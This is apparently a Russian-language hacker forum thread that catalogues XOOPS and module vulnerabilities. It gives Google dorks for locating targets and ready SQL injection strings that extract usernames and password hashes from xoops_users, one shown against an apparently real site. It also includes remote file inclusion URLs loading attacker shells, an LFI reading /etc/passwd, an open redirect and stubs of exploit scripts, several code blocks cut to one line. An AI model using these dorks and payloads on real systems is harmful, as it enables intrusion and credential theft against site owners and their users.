![]() |
[Обзор уязвимости] Xoops и его модулей.
XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability
DORKS 1 : allinurl :"/modules/tutorials/" DORK 2 : allinurl :"/modules/tutorials/"tid EXPLOIT 1 : PHP код:
PHP код:
XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability DORKS 1 : allinurl :"modules/my_egallery" EXPLOIT : PHP код:
================================================ XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability DORKS 1 : allinurl :"modules/gallery" DORK 2 : allinurl :"modules/gallery"gid EXPLOIT : PHP код:
================================================ XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid" DORK 2 : allinurl: "modules/wfdownloads" EXPLOIT : PHP код:
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerabilit DORK 1 : allinurl: "modules/glossaires" EXPLOIT : PHP код:
PS найденные за март 2008 |
LFI
Vulnerable: XOOPS 2.0.18 Уязвимый скрипт: htdocs/install/index.php PHP код:
PoC: Код:
POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0Vulnerable: XOOPS 2.0.18 Уязвимый скрипт: htdocs/user.php?xoops_redirect POST-переменная "xoops_redirect" не фильтруется PoC: Код:
http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com |
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
DORK 1 : allinurl: "modules/dictionary" DORK 2 : allinurl: "modules/dictionary/print.php?id" EXPLOIT : Код HTML:
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/* |
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability Код:
##########################################milw0rm.com |
XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability
SQL Injection
Vulnerable: XOOPS Project-Recette(Recipe)2.2 Exploit: Код:
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*Код:
allinurl :\"modules/recipe\" |
RFI
Vulnerable: XOOPS Module XFsection Vuln script: modify.php PoC: Код:
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?Vuln script: /admin/spaw/spaw_control.class.php PHP код:
Код:
http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?Vuln script: /admin/editor2/spaw_control.class.php PHP код:
PoC: Код:
http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?Exploit: Код HTML:
<html>PoC: Код:
[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=ShellRemote SQL Injection Vulnerable: XOOPS Module Jobs <= 2.4 Код:
#!/usr/bin/perl |
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
PHP код:
|
Solide Snake, не разу на blind не натыкался.
xoops # Article Module # sql injection Код:
modules/articles/article.php?id={SQL}---uname -pass example: Код:
http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--Код:
#!usr/bin/perl |
XOOPS modules/easyweb/
SQL-inj Exploit Код:
-555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--dOrK: inurl:/modules/easyweb/ |
XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
Код:
#!/usr/bin/php -q |
LFI[Xoops 2.2.6]
Под руку попалась эта версия. Смотри исходники system/admin.php: Код:
<?phpКод:
http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00 |
| Время: 01:52 |